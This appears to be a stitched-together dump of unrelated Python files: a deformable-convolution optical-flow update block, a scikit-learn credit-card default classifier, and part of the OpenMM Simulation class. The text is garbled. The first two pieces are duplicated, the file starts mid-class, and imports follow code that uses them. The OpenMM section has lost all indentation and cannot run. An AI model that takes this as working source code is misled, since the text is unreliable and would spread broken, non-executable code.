        reset = torch.sigmoid(func_conv_deform_2(hx, self.convr2, 1, 5, 1, 1, 215,'', False))
        cand = torch.tanh(func_conv_deform_2(torch.cat([reset*h, x], dim=1), self.convq2, 1, 5, 1, 1, 216,'', False))
        return (1 - update) * h + update * cand
class SmallMotionEncoder(nn.Module):
    """Encode the correlation volume and current flow into motion features."""

    def __init__(self, args):
        super(SmallMotionEncoder, self).__init__()
        cor_planes = args.corr_levels * (2 * args.corr_radius + 1) ** 2
        self.convc1 = nn.Conv2d(cor_planes, 96, 1, padding=0)
        self.convf1 = nn.Conv2d(2, 64, 7, padding=3)
        self.convf2 = nn.Conv2d(64, 32, 3, padding=1)
        self.conv = nn.Conv2d(128, 80, 3, padding=1)

    def forward(self, flow, corr):
        corr_feat = F.relu(self.convc1(corr))
        flow_feat = F.relu(self.convf2(F.relu(self.convf1(flow))))
        merged = F.relu(self.conv(torch.cat([corr_feat, flow_feat], dim=1)))
        # Append the raw flow so downstream layers see it directly.
        return torch.cat([merged, flow], dim=1)
class BasicMotionEncoder(nn.Module):
    """Encode the correlation volume and current flow into 128-channel motion features."""

    def __init__(self, args):
        super(BasicMotionEncoder, self).__init__()
        cor_planes = args.corr_levels * (2 * args.corr_radius + 1) ** 2
        self.convc1 = nn.Conv2d(cor_planes, 256, 1, padding=0)
        # Deformable counterparts of the original plain convolutions.
        self.convc2 = torchvision.ops.DeformConv2d(256, 192, 3, padding=1)
        self.convf1 = torchvision.ops.DeformConv2d(2, 128, 7, padding=3)
        self.convf2 = torchvision.ops.DeformConv2d(128, 64, 3, padding=1)
        self.conv = torchvision.ops.DeformConv2d(64+192, 128-2, 3, padding=1)

    def forward(self, flow, corr):
        corr_feat = F.relu(self.convc1(corr))
        corr_feat = F.relu(func_conv_deform(corr_feat, self.convc2, 3, 1, 201, '', False))
        flow_feat = F.relu(func_conv_deform(flow, self.convf1, 7, 1, 202, '', False))
        flow_feat = F.relu(func_conv_deform(flow_feat, self.convf2, 3, 1, 203, '', False))
        merged = torch.cat([corr_feat, flow_feat], dim=1)
        out = F.relu(func_conv_deform(merged, self.conv, 3, 1, 204, '', False))
        # Append the raw flow so downstream layers see it directly.
        return torch.cat([out, flow], dim=1)
class SmallUpdateBlock(nn.Module):
    """GRU-based update operator for the small model variant."""

    def __init__(self, args, hidden_dim=96):
        super(SmallUpdateBlock, self).__init__()
        self.encoder = SmallMotionEncoder(args)
        self.gru = ConvGRU(hidden_dim=hidden_dim, input_dim=82+64)
        self.flow_head = FlowHead(hidden_dim, hidden_dim=128)

    def forward(self, net, inp, corr, flow):
        features = self.encoder(flow, corr)
        net = self.gru(net, torch.cat([inp, features], dim=1))
        # The small model has no upsampling mask, hence the None slot.
        return net, None, self.flow_head(net)
class mySequential(nn.Sequential):
    """Sequential container whose modules may receive a tuple of arguments."""

    def forward(self, *input):
        out = input
        for module in self._modules.values():
            # A tuple is splatted into the module; anything else is passed as-is.
            out = module(*out) if type(out) == tuple else module(out)
        return out
class BasicUpdateBlock(nn.Module):
    """GRU-based update operator producing a flow delta and an upsampling mask.

    The mask head's first convolution is deformable, so self.mask is a
    mySequential that forwards (net, offset) through the stack.
    """

    def __init__(self, args, hidden_dim=128, input_dim=128):
        super(BasicUpdateBlock, self).__init__()
        self.args = args
        self.encoder = BasicMotionEncoder(args)
        self.gru = SepConvGRU(hidden_dim=hidden_dim, input_dim=128+hidden_dim)
        self.flow_head = FlowHead(hidden_dim, hidden_dim=256)
        self.mask = mySequential(
            torchvision.ops.DeformConv2d(128, 256, 3, padding=1),
            nn.ReLU(inplace=True),
            nn.Conv2d(256, 64*9, 1, padding=0))

    def forward(self, net, inp, corr, flow, upsample=True, num_l_d=0):
        motion_features = self.encoder(flow, corr)
        inp = torch.cat([inp, motion_features], dim=1)
        net = self.gru(net, inp)
        delta_flow = self.flow_head(net)
        # Offsets for the deformable mask head; layer 231 is currently disabled,
        # so zero offsets (plain convolution behaviour) are used.
        activated_231 = False
        if activated_231 == True:
            print("231 activated")
            offset_file = './OFFSETS/offset_'+str(int(net.shape[3]/1))+'_'+str(int(net.shape[2]/1))+'_3_3_1_1_1'+'.pt'
            offset = torch.load(offset_file).cuda()
        else:
            print("231 not activated")
            offset = torch.zeros(net.shape[0], 2*3*3, int(net.shape[2]/1), int(net.shape[3]/1)).cuda()
        # Fix: the original set 'offset.require_gradient', which is not a Tensor
        # attribute; requires_grad_(False) actually detaches the offsets.
        offset.requires_grad_(False)
        # Scale mask to balance gradients (original comment: "balence").
        mask = .25 * self.mask(net, offset)
        del offset
        torch.cuda.empty_cache()
        # Fix: the original return line had dataset-row residue fused onto it
        # ("| core/update_sphe.py | import torch").
        return net, mask, delta_flow
import torch.nn as nn
import torch.nn.functional as F
import torchvision
def func_conv_deform(x, loc_layer, k, s, layers_act_num, offset_file = '', activated = False):
    """Apply a square-kernel deformable convolution with precomputed or zero offsets.

    :param x: input tensor of shape (N, C, H, W).
    :param loc_layer: a torchvision.ops.DeformConv2d layer.
    :param k: square kernel size (used to size zero offsets / locate the offset file).
    :param s: stride (used to size zero offsets / locate the offset file).
    :param layers_act_num: layer index, printed and gated against the <=400 limit.
    :param offset_file: optional explicit path to a saved offset tensor.
    :param activated: if True (and layers_act_num <= 400), load offsets from disk;
        otherwise all-zero offsets are used, i.e. plain convolution behaviour.
    :return: output of loc_layer applied to x with the chosen offsets.
    """
    if offset_file == '':
        # Default path encodes output W, H, kernel and stride: offset_W_H_k_k_s_s_1.pt
        offset_file = './OFFSETS/offset_'+str(int(x.shape[3]/s))+'_'+str(int(x.shape[2]/s))+'_'+str(k)+'_'+str(k)+'_'+str(s)+'_'+str(s)+'_1'+'.pt'
    if activated and layers_act_num <= 400:
        print(layers_act_num, " activated")
        offset = torch.load(offset_file).cuda()
        if x.shape[0] != 1:
            # Replicate the single saved offset map across the batch.
            offset = torch.cat([offset for _ in range(x.shape[0])], dim=0)
    else:
        print(layers_act_num, " not activated")
        offset = torch.zeros(x.shape[0], 2*k*k, int(x.shape[2]/s), int(x.shape[3]/s)).cuda()
    # Fix: 'offset.require_gradient' is not a Tensor attribute and was silently
    # ignored; requires_grad_(False) actually excludes the offsets from autograd.
    offset.requires_grad_(False)
    y = loc_layer(x, offset)
    del offset
    torch.cuda.empty_cache()
    return y
def func_conv_deform_2(x, loc_layer, kw, kh, sw, sh, layers_act_num, offset_file = '', activated = False):
    """Apply a rectangular-kernel deformable convolution with precomputed or zero offsets.

    :param x: input tensor of shape (N, C, H, W).
    :param loc_layer: a torchvision.ops.DeformConv2d layer.
    :param kw, kh: kernel width and height.
    :param sw, sh: strides along the two axes.
    :param layers_act_num: layer index, printed and gated against the <=400 limit.
    :param offset_file: optional explicit path to a saved offset tensor.
    :param activated: if True (and layers_act_num <= 400), load offsets from disk;
        otherwise all-zero offsets are used, i.e. plain convolution behaviour.
    :return: output of loc_layer applied to x with the chosen offsets.
    """
    if offset_file == '':
        offset_file = './OFFSETS/offset_'+str(int(x.shape[3]/sw))+'_'+str(int(x.shape[2]/sh))+'_'+str(kw)+'_'+str(kh)+'_'+str(sw)+'_'+str(sh)+'_1'+'.pt'
    if activated and layers_act_num <= 400:
        print(layers_act_num, " activated")
        offset = torch.load(offset_file).cuda()
        if x.shape[0] != 1:
            # Replicate the single saved offset map across the batch.
            offset = torch.cat([offset for _ in range(x.shape[0])], dim=0)
    else:
        print(layers_act_num, " not activated")
        # NOTE(review): height is divided by sw and width by sh here, the
        # opposite of the file-name computation above — confirm intended.
        offset = torch.zeros(x.shape[0], 2*kw*kh, int(x.shape[2]/sw), int(x.shape[3]/sh)).cuda()
    # Fix: 'offset.require_gradient' is not a Tensor attribute;
    # requires_grad_(False) actually detaches the offsets.
    offset.requires_grad_(False)
    y = loc_layer(x, offset)
    del offset
    torch.cuda.empty_cache()
    return y
class FlowHead(nn.Module):
    """Two deformable 3x3 convolutions mapping features to a 2-channel flow field."""

    def __init__(self, input_dim=128, hidden_dim=256):
        super(FlowHead, self).__init__()
        # Deformable counterparts of the plain 3x3 convolutions used upstream.
        self.conv1 = torchvision.ops.DeformConv2d(input_dim, hidden_dim, 3, padding=1)
        self.conv2 = torchvision.ops.DeformConv2d(hidden_dim, 2, 3, padding=1)
        self.relu = nn.ReLU(inplace=True)

    def forward(self, x):
        hidden = self.relu(func_conv_deform(x, self.conv1, 3, 1, 221, '', False))
        return func_conv_deform(hidden, self.conv2, 3, 1, 222, '', False)
class ConvGRU(nn.Module):
    """Convolutional GRU cell: one 3x3 convolution per gate."""

    def __init__(self, hidden_dim=128, input_dim=192+128):
        super(ConvGRU, self).__init__()
        gate_in = hidden_dim + input_dim
        self.convz = nn.Conv2d(gate_in, hidden_dim, 3, padding=1)  # update gate
        self.convr = nn.Conv2d(gate_in, hidden_dim, 3, padding=1)  # reset gate
        self.convq = nn.Conv2d(gate_in, hidden_dim, 3, padding=1)  # candidate state

    def forward(self, h, x):
        stacked = torch.cat([h, x], dim=1)
        update = torch.sigmoid(self.convz(stacked))
        reset = torch.sigmoid(self.convr(stacked))
        candidate = torch.tanh(self.convq(torch.cat([reset * h, x], dim=1)))
        return (1 - update) * h + update * candidate
class SepConvGRU(nn.Module):
    """GRU cell with separable deformable gate convolutions (1x5 pass, then 5x1)."""

    def __init__(self, hidden_dim=128, input_dim=192+128):
        super(SepConvGRU, self).__init__()
        gate_in = hidden_dim + input_dim
        # Horizontal (1x5) gate convolutions.
        self.convz1 = torchvision.ops.DeformConv2d(gate_in, hidden_dim, (1,5), padding=(0,2))
        self.convr1 = torchvision.ops.DeformConv2d(gate_in, hidden_dim, (1,5), padding=(0,2))
        self.convq1 = torchvision.ops.DeformConv2d(gate_in, hidden_dim, (1,5), padding=(0,2))
        # Vertical (5x1) gate convolutions.
        self.convz2 = torchvision.ops.DeformConv2d(gate_in, hidden_dim, (5,1), padding=(2,0))
        self.convr2 = torchvision.ops.DeformConv2d(gate_in, hidden_dim, (5,1), padding=(2,0))
        self.convq2 = torchvision.ops.DeformConv2d(gate_in, hidden_dim, (5,1), padding=(2,0))

    def forward(self, h, x):
        # Horizontal pass.
        hx = torch.cat([h, x], dim=1)
        update = torch.sigmoid(func_conv_deform_2(hx, self.convz1, 5, 1, 1, 1, 211,'', False))
        reset = torch.sigmoid(func_conv_deform_2(hx, self.convr1, 5, 1, 1, 1, 212,'', False))
        cand = torch.tanh(func_conv_deform_2(torch.cat([reset*h, x], dim=1), self.convq1, 5, 1, 1, 1, 213,'', False))
        h = (1 - update) * h + update * cand
        # Vertical pass on the updated state.
        hx = torch.cat([h, x], dim=1)
        update = torch.sigmoid(func_conv_deform_2(hx, self.convz2, 1, 5, 1, 1, 214,'', False))
        reset = torch.sigmoid(func_conv_deform_2(hx, self.convr2, 1, 5, 1, 1, 215,'', False))
        cand = torch.tanh(func_conv_deform_2(torch.cat([reset*h, x], dim=1), self.convq2, 1, 5, 1, 1, 216,'', False))
        return (1 - update) * h + update * cand
class SmallMotionEncoder(nn.Module):
    """Encode the correlation volume and current flow into motion features."""

    def __init__(self, args):
        super(SmallMotionEncoder, self).__init__()
        cor_planes = args.corr_levels * (2 * args.corr_radius + 1) ** 2
        self.convc1 = nn.Conv2d(cor_planes, 96, 1, padding=0)
        self.convf1 = nn.Conv2d(2, 64, 7, padding=3)
        self.convf2 = nn.Conv2d(64, 32, 3, padding=1)
        self.conv = nn.Conv2d(128, 80, 3, padding=1)

    def forward(self, flow, corr):
        corr_feat = F.relu(self.convc1(corr))
        flow_feat = F.relu(self.convf2(F.relu(self.convf1(flow))))
        merged = F.relu(self.conv(torch.cat([corr_feat, flow_feat], dim=1)))
        # Append the raw flow so downstream layers see it directly.
        return torch.cat([merged, flow], dim=1)
class BasicMotionEncoder(nn.Module):
    """Encode the correlation volume and current flow into 128-channel motion features."""

    def __init__(self, args):
        super(BasicMotionEncoder, self).__init__()
        cor_planes = args.corr_levels * (2 * args.corr_radius + 1) ** 2
        self.convc1 = nn.Conv2d(cor_planes, 256, 1, padding=0)
        # Deformable counterparts of the original plain convolutions.
        self.convc2 = torchvision.ops.DeformConv2d(256, 192, 3, padding=1)
        self.convf1 = torchvision.ops.DeformConv2d(2, 128, 7, padding=3)
        self.convf2 = torchvision.ops.DeformConv2d(128, 64, 3, padding=1)
        self.conv = torchvision.ops.DeformConv2d(64+192, 128-2, 3, padding=1)

    def forward(self, flow, corr):
        corr_feat = F.relu(self.convc1(corr))
        corr_feat = F.relu(func_conv_deform(corr_feat, self.convc2, 3, 1, 201, '', False))
        flow_feat = F.relu(func_conv_deform(flow, self.convf1, 7, 1, 202, '', False))
        flow_feat = F.relu(func_conv_deform(flow_feat, self.convf2, 3, 1, 203, '', False))
        merged = torch.cat([corr_feat, flow_feat], dim=1)
        out = F.relu(func_conv_deform(merged, self.conv, 3, 1, 204, '', False))
        # Append the raw flow so downstream layers see it directly.
        return torch.cat([out, flow], dim=1)
class SmallUpdateBlock(nn.Module):
    """GRU-based update operator for the small model variant."""

    def __init__(self, args, hidden_dim=96):
        super(SmallUpdateBlock, self).__init__()
        self.encoder = SmallMotionEncoder(args)
        self.gru = ConvGRU(hidden_dim=hidden_dim, input_dim=82+64)
        self.flow_head = FlowHead(hidden_dim, hidden_dim=128)

    def forward(self, net, inp, corr, flow):
        features = self.encoder(flow, corr)
        net = self.gru(net, torch.cat([inp, features], dim=1))
        # The small model has no upsampling mask, hence the None slot.
        return net, None, self.flow_head(net)
class mySequential(nn.Sequential):
    """Sequential container whose modules may receive a tuple of arguments."""

    def forward(self, *input):
        out = input
        for module in self._modules.values():
            # A tuple is splatted into the module; anything else is passed as-is.
            out = module(*out) if type(out) == tuple else module(out)
        return out
class BasicUpdateBlock(nn.Module):
    """GRU-based update operator producing a flow delta and an upsampling mask.

    The mask head's first convolution is deformable, so self.mask is a
    mySequential that forwards (net, offset) through the stack.
    """

    def __init__(self, args, hidden_dim=128, input_dim=128):
        super(BasicUpdateBlock, self).__init__()
        self.args = args
        self.encoder = BasicMotionEncoder(args)
        self.gru = SepConvGRU(hidden_dim=hidden_dim, input_dim=128+hidden_dim)
        self.flow_head = FlowHead(hidden_dim, hidden_dim=256)
        self.mask = mySequential(
            torchvision.ops.DeformConv2d(128, 256, 3, padding=1),
            nn.ReLU(inplace=True),
            nn.Conv2d(256, 64*9, 1, padding=0))

    def forward(self, net, inp, corr, flow, upsample=True, num_l_d=0):
        motion_features = self.encoder(flow, corr)
        inp = torch.cat([inp, motion_features], dim=1)
        net = self.gru(net, inp)
        delta_flow = self.flow_head(net)
        # Offsets for the deformable mask head; layer 231 is currently disabled,
        # so zero offsets (plain convolution behaviour) are used.
        activated_231 = False
        if activated_231 == True:
            print("231 activated")
            offset_file = './OFFSETS/offset_'+str(int(net.shape[3]/1))+'_'+str(int(net.shape[2]/1))+'_3_3_1_1_1'+'.pt'
            offset = torch.load(offset_file).cuda()
        else:
            print("231 not activated")
            offset = torch.zeros(net.shape[0], 2*3*3, int(net.shape[2]/1), int(net.shape[3]/1)).cuda()
        # Fix: 'offset.require_gradient' is not a Tensor attribute;
        # requires_grad_(False) actually detaches the offsets.
        offset.requires_grad_(False)
        # Scale mask to balance gradients.
        mask = .25 * self.mask(net, offset)
        del offset
        torch.cuda.empty_cache()
        # Fix: the original return line had dataset metadata ("| 0.667473 | ...")
        # fused onto it, making the file unparseable.
        return net, mask, delta_flow
import matplotlib
import pandas as pd
from sklearn.model_selection import learning_curve, train_test_split, GridSearchCV
from sklearn.preprocessing import StandardScaler
from sklearn.pipeline import Pipeline
from sklearn.metrics import accuracy_score
from sklearn.svm import SVC
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.neighbors import KNeighborsClassifier
from matplotlib import pyplot as plt
# 打印配置文件路径 我的是在个人文件夹
print(matplotlib.matplotlib_fname())
import seaborn as sns
# Load the data set.
data = pd.read_csv('./UCI_Credit_Card.csv')  # fix: was the duplicated 'data = data = ...'
# Explore the data.
print(data.shape)  # size of the data set
print(data.describe())  # summary statistics
# Look at next month's default counts.
next_month = data['default.payment.next.month'].value_counts()
print(next_month)
df = pd.DataFrame({'default.payment.next.month': next_month.index, 'values': next_month.values})
plt.rcParams['font.sans-serif'] = ['SimHei']  # render CJK characters correctly
plt.figure(figsize=(6, 6))
plt.title(u'信用卡违约率客户\n (违约:1,守约:0)')
sns.set_color_codes("pastel")
sns.barplot(x='default.payment.next.month', y="values", data=df)
locs, labels = plt.xticks()
plt.show()
# Feature selection: drop the ID column (no predictive value) and keep the label aside.
data.drop(['ID'], inplace=True, axis=1)
target = data['default.payment.next.month'].values
columns = data.columns.tolist()
columns.remove('default.payment.next.month')
features = data[columns].values
# 30% held out as the test set, stratified on the label.
train_x, test_x, train_y, test_y = train_test_split(features, target, test_size=0.30, stratify=target, random_state=1)
# Candidate classifiers.
classifiers = [
    SVC(random_state=1, kernel='rbf'),
    DecisionTreeClassifier(random_state=1, criterion='gini'),
    RandomForestClassifier(random_state=1, criterion='gini'),
    KNeighborsClassifier(metric='minkowski'),
]
# Pipeline step names, one per classifier.
classifier_names = [
    'svc',
    'decisiontreeclassifier',
    'randomforestclassifier',
    'kneighborsclassifier',
]
# Hyper-parameter grids, keyed by '<step_name>__<param>'.
classifier_param_grid = [
    {'svc__C': [1], 'svc__gamma': [0.01]},
    {'decisiontreeclassifier__max_depth': [6, 9, 11]},
    {'randomforestclassifier__n_estimators': [3, 5, 6]},
    {'kneighborsclassifier__n_neighbors': [4, 6, 8]},
]
# Run GridSearchCV parameter tuning for one concrete classifier pipeline.
def GridSearchCV_work(pipeline, train_x, train_y, test_x, test_y, param_grid, score='accuracy'):
    """Tune *pipeline* over *param_grid* and report CV and test-set accuracy.

    :return: dict with 'predict_y' (test predictions) and 'accuracy_score'.
    """
    response = {}
    gridsearch = GridSearchCV(estimator=pipeline, param_grid=param_grid, scoring=score)
    # Search for the best parameters and the best cross-validated score.
    search = gridsearch.fit(train_x, train_y)
    print("GridSearch最优参数:", search.best_params_)
    print("GridSearch最优分数: %0.4lf" % search.best_score_)
    predict_y = gridsearch.predict(test_x)
    accuracy = accuracy_score(test_y, predict_y)  # fix: was computed twice
    print("准确率 %0.4lf" % accuracy)
    response['predict_y'] = predict_y
    response['accuracy_score'] = accuracy
    return response
# Tune each classifier inside a scaling pipeline.
for model, model_name, model_param_grid in zip(classifiers, classifier_names, classifier_param_grid):
    pipeline = Pipeline([
        ('scaler', StandardScaler()),
        (model_name, model)
    ])
    # Fix: the original last line had dataset-row residue fused onto it
    # ("| 39/demo4.py | import matplotlib").
    result = GridSearchCV_work(pipeline, train_x, train_y, test_x, test_y, model_param_grid, score='accuracy')
import pandas as pd
from sklearn.model_selection import learning_curve, train_test_split, GridSearchCV
from sklearn.preprocessing import StandardScaler
from sklearn.pipeline import Pipeline
from sklearn.metrics import accuracy_score
from sklearn.svm import SVC
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.neighbors import KNeighborsClassifier
from matplotlib import pyplot as plt
# 打印配置文件路径 我的是在个人文件夹
print(matplotlib.matplotlib_fname())
import seaborn as sns
# Load the data set.
data = pd.read_csv('./UCI_Credit_Card.csv')  # fix: was the duplicated 'data = data = ...'
# Explore the data.
print(data.shape)  # size of the data set
print(data.describe())  # summary statistics
# Look at next month's default counts.
next_month = data['default.payment.next.month'].value_counts()
print(next_month)
df = pd.DataFrame({'default.payment.next.month': next_month.index, 'values': next_month.values})
plt.rcParams['font.sans-serif'] = ['SimHei']  # render CJK characters correctly
plt.figure(figsize=(6, 6))
plt.title(u'信用卡违约率客户\n (违约:1,守约:0)')
sns.set_color_codes("pastel")
sns.barplot(x='default.payment.next.month', y="values", data=df)
locs, labels = plt.xticks()
plt.show()
# Feature selection: drop the ID column (no predictive value) and keep the label aside.
data.drop(['ID'], inplace=True, axis=1)
target = data['default.payment.next.month'].values
columns = data.columns.tolist()
columns.remove('default.payment.next.month')
features = data[columns].values
# 30% held out as the test set, stratified on the label.
train_x, test_x, train_y, test_y = train_test_split(features, target, test_size=0.30, stratify=target, random_state=1)
# Candidate classifiers.
classifiers = [
    SVC(random_state=1, kernel='rbf'),
    DecisionTreeClassifier(random_state=1, criterion='gini'),
    RandomForestClassifier(random_state=1, criterion='gini'),
    KNeighborsClassifier(metric='minkowski'),
]
# Pipeline step names, one per classifier.
classifier_names = [
    'svc',
    'decisiontreeclassifier',
    'randomforestclassifier',
    'kneighborsclassifier',
]
# Hyper-parameter grids, keyed by '<step_name>__<param>'.
classifier_param_grid = [
    {'svc__C': [1], 'svc__gamma': [0.01]},
    {'decisiontreeclassifier__max_depth': [6, 9, 11]},
    {'randomforestclassifier__n_estimators': [3, 5, 6]},
    {'kneighborsclassifier__n_neighbors': [4, 6, 8]},
]
# Run GridSearchCV parameter tuning for one concrete classifier pipeline.
def GridSearchCV_work(pipeline, train_x, train_y, test_x, test_y, param_grid, score='accuracy'):
    """Tune *pipeline* over *param_grid* and report CV and test-set accuracy.

    :return: dict with 'predict_y' (test predictions) and 'accuracy_score'.
    """
    response = {}
    gridsearch = GridSearchCV(estimator=pipeline, param_grid=param_grid, scoring=score)
    # Search for the best parameters and the best cross-validated score.
    search = gridsearch.fit(train_x, train_y)
    print("GridSearch最优参数:", search.best_params_)
    print("GridSearch最优分数: %0.4lf" % search.best_score_)
    predict_y = gridsearch.predict(test_x)
    accuracy = accuracy_score(test_y, predict_y)  # fix: was computed twice
    print("准确率 %0.4lf" % accuracy)
    response['predict_y'] = predict_y
    response['accuracy_score'] = accuracy
    return response
# Tune each classifier inside a scaling pipeline.
for model, model_name, model_param_grid in zip(classifiers, classifier_names, classifier_param_grid):
    pipeline = Pipeline([
        ('scaler', StandardScaler()),
        (model_name, model)
    ])
    # Fix: the original last line had dataset metadata ("| 0.521471 | ...")
    # fused onto it, making the file unparseable.
    result = GridSearchCV_work(pipeline, train_x, train_y, test_x, test_y, model_param_grid, score='accuracy')
from __future__ import absolute_import
__author__ = "<NAME>"
__version__ = "1.0"
import simtk.openmm as mm
import simtk.unit as unit
import sys
from datetime import datetime, timedelta
try:
    # Python 2: text may be either unicode or str.
    string_types = (unicode, str)
except NameError:
    # Python 3: 'unicode' is gone; str covers all text.
    string_types = (str,)
class Simulation(object):
"""Simulation provides a simplified API for running simulations with OpenMM and reporting results.
A Simulation ties together various objects used for running a simulation: a Topology, System,
Integrator, and Context. To use it, you provide the Topology, System, and Integrator, and it
creates the Context automatically.
Simulation also maintains a list of "reporter" objects that record or analyze data as the simulation
runs, such as writing coordinates to files or displaying structures on the screen. For example,
the following line will cause a file called "output.pdb" to be created, and a structure written to
it every 1000 time steps:
simulation.reporters.append(PDBReporter('output.pdb', 1000))
"""
def __init__(self, topology, system, integrator, platform=None, platformProperties=None, state=None):
"""Create a Simulation.
Parameters
----------
topology : Topology
A Topology describing the the system to simulate
system : System or XML file name
The OpenMM System object to simulate (or the name of an XML file
with a serialized System)
integrator : Integrator or XML file name
The OpenMM Integrator to use for simulating the System (or the name
of an XML file with a serialized System)
platform : Platform=None
If not None, the OpenMM Platform to use
platformProperties : map=None
If not None, a set of platform-specific properties to pass to the
Context's constructor
state : XML file name=None
The name of an XML file containing a serialized State. If not None,
the information stored in state will be transferred to the generated
Simulation object.
"""
self.topology = topology
## The System being simulated
if isinstance(system, string_types):
with open(system, 'r') as f:
self.system = mm.XmlSerializer.deserialize(f.read())
else:
self.system = system
## The Integrator used to advance the simulation
if isinstance(integrator, string_types):
with open(integrator, 'r') as f:
self.integrator = mm.XmlSerializer.deserialize(f.read())
else:
self.integrator = integrator
## The index of the current time step
self.currentStep = 0
## A list of reporters to invoke during the simulation
self.reporters = []
if platform is None:
## The Context containing the current state of the simulation
self.context = mm.Context(self.system, self.integrator)
elif platformProperties is None:
self.context = mm.Context(self.system, self.integrator, platform)
else:
self.context = mm.Context(self.system, self.integrator, platform, platformProperties)
if state is not None:
with open(state, 'r') as f:
self.context.setState(mm.XmlSerializer.deserialize(f.read()))
## Determines whether or not we are using PBC. Try from the System first,
## fall back to Topology if that doesn't work
try:
self._usesPBC = self.system.usesPeriodicBoundaryConditions()
except Exception: # OpenMM just raises Exception if it's not implemented everywhere
self._usesPBC = topology.getUnitCellDimensions() is not None
def minimizeEnergy(self, tolerance=10*unit.kilojoule/unit.mole, maxIterations=0):
"""Perform a local energy minimization on the system.
Parameters
----------
tolerance : energy=10*kilojoules/mole
The energy tolerance to which the system should be minimized
maxIterations : int=0
The maximum number of iterations to perform. If this is 0,
minimization is continued until the results converge without regard
to how many iterations it takes.
"""
mm.LocalEnergyMinimizer.minimize(self.context, tolerance, maxIterations)
def step(self, steps):
"""Advance the simulation by integrating a specified number of time steps."""
self._simulate(endStep=self.currentStep+steps)
def runForClockTime(self, time, checkpointFile=None, stateFile=None, checkpointInterval=None):
"""Advance the simulation by integrating time steps until a fixed amount of clock time has elapsed.
This is useful when you have a limited amount of computer time available, and want to run the longest simulation
possible in that time. This method will continue taking time steps until the specified clock time has elapsed,
then return. It also can automatically write out a checkpoint and/or state file before returning, so you can
later resume the simulation. Another option allows it to write checkpoints or states at regular intervals, so
you can resume even if the simulation is interrupted before the time limit is reached.
Parameters
----------
time : time
the amount of time to run for. If no units are specified, it is
assumed to be a number of hours.
checkpointFile : string or file=None
if specified, a checkpoint file will be written at the end of the
simulation (and optionally at regular intervals before then) by
passing this to saveCheckpoint().
stateFile : string or file=None
if specified, a state file will be written at the end of the
simulation (and optionally at regular intervals before then) by
passing this to saveState().
checkpointInterval : time=None
if specified, checkpoints and/or states will be written at regular
intervals during the simulation, in addition to writing a final
version at the end. If no units are specified, this is assumed to
be in hours.
"""
if unit.is_quantity(time):
time = time.value_in_unit(unit.hours)
if unit.is_quantity(checkpointInterval):
checkpointInterval = checkpointInterval.value_in_unit(unit.hours)
endTime = datetime.now()+timedelta(hours=time)
while (datetime.now() < endTime):
if checkpointInterval is None:
nextTime = endTime
else:
nextTime = datetime.now()+timedelta(hours=checkpointInterval)
if nextTime > endTime:
nextTime = endTime
self._simulate(endTime=nextTime)
if checkpointFile is not None:
self.saveCheckpoint(checkpointFile)
if stateFile is not None:
self.saveState(stateFile)
def _simulate(self, endStep=None, endTime=None):
if endStep is None:
endStep = sys.maxsize
nextReport = [None]*len(self.reporters)
while self.currentStep < endStep and (endTime is None or datetime.now() < endTime):
nextSteps = endStep-self.currentStep
# Find when the next report will happen.
anyReport = False
for i, reporter in enumerate(self.reporters):
nextReport[i] = reporter.describeNextReport(self)
if nextReport[i][0] > 0 and nextReport[i][0] <= nextSteps:
nextSteps = nextReport[i][0]
anyReport = True
stepsToGo = nextSteps
while stepsToGo > 10:
self.integrator.step(10) # Only take 10 steps at a time, to give Python more chances to respond to a control-c.
stepsToGo -= 10
self.currentStep += 10
if endTime is not None and datetime.now() >= endTime:
return
self.integrator.step(stepsToGo)
self.currentStep += stepsToGo
if anyReport:
# One or more reporters are ready to generate reports. Organize them into three
# groups: ones that want wrapped positions, ones that want unwrapped positions,
# and ones that don't care about positions.
wrapped = []
unwrapped = []
either = []
for reporter, report in zip(self.reporters, nextReport):
if report[0] == nextSteps:
if len(report) > 5:
wantWrap = report[5]
if wantWrap is None:
wantWrap = self._usesPBC
else:
wantWrap = self._usesPBC
if not report[1]:
either.append((reporter, report))
elif wantWrap:
wrapped.append((reporter, report))
else:
unwrapped.append((reporter, report))
if len(wrapped) > len(unwrapped):
wrapped += either
else:
unwrapped += either
# Generate the reports.
if len(wrapped) > 0:
self._generate_reports(wrapped, True)
if len(unwrapped) > 0:
self._generate_reports(unwrapped, False)
def _generate_reports(self, reports, periodic):
getPositions = False
getVelocities = False
getForces = False
getEnergy = False
for reporter, next in reports:
if next[1]:
getPositions = True
if next[2]:
getVelocities = True
if next[3]:
getForces = True
if next[4]:
getEnergy = True
state = self.context.getState(getPositions=getPositions, getVelocities=getVelocities, getForces=getForces,
getEnergy=getEnergy, getParameters=True, enforcePeriodicBox=periodic)
for reporter, next in reports:
reporter.report(self, state)
def saveCheckpoint(self, file):
"""Save a checkpoint of the simulation to a file.
The output is a binary file that contains a complete representation of the current state of the Simulation.
It includes both publicly visible data such as the particle positions and velocities, and also internal data
such as the states of random number generators. Reloading the checkpoint will put the Simulation back into
precisely the same state it had before, so it can be exactly continued.
A checkpoint file is highly specific to the Simulation it was created from. It can only be loaded into
another Simulation that has an identical System, uses the same Platform and OpenMM version, and is running on
identical hardware. If you need a more portable way to resume simulations, consider using saveState() instead.
Parameters
----------
file : string or file
a File-like object to write the checkpoint to, or alternatively a
filename
"""
if isinstance(file, str):
with open(file, 'wb') as f:
f.write(self.context.createCheckpoint())
else:
file.write(self.context.createCheckpoint())
def loadCheckpoint(self, file):
"""Load a checkpoint file that was created with saveCheckpoint().
Parameters
----------
file : string or file
a File-like object to load the checkpoint from, or alternatively a
filename
"""
if isinstance(file, str):
with open(file, 'rb') as f:
self.context.loadCheckpoint(f.read())
else:
self.context.loadCheckpoint(file.read())
def saveState(self, file):
"""Save the current state of the simulation to a file.
The output is an XML file containing a serialized State object. It includes all publicly visible data,
including positions, velocities, and parameters. Reloading the State will put the Simulation back into
approximately the same state it had before.
Unlike saveCheckpoint(), this does not store internal data such as the states of random number generators.
Therefore, you should not expect the following trajectory to be identical to what would have been produced
with the original Simulation. On the other hand, this means it is portable across different Platforms or
hardware.
Parameters
----------
file : string or file
a File-like object to write the state to, or alternatively a
filename
"""
state = self.context.getState(getPositions=True, getVelocities=True, getParameters=True)
xml = mm.XmlSerializer.serialize(state)
if isinstance(file, str):
with open(file, 'w') as f:
f.write(xml)
else:
file.write(xml)
def loadState(self, file):
"""Load a State file that was created with saveState().
Parameters
----------
file : string or file
a File-like object to load the state from, or alternatively a
filename
"""
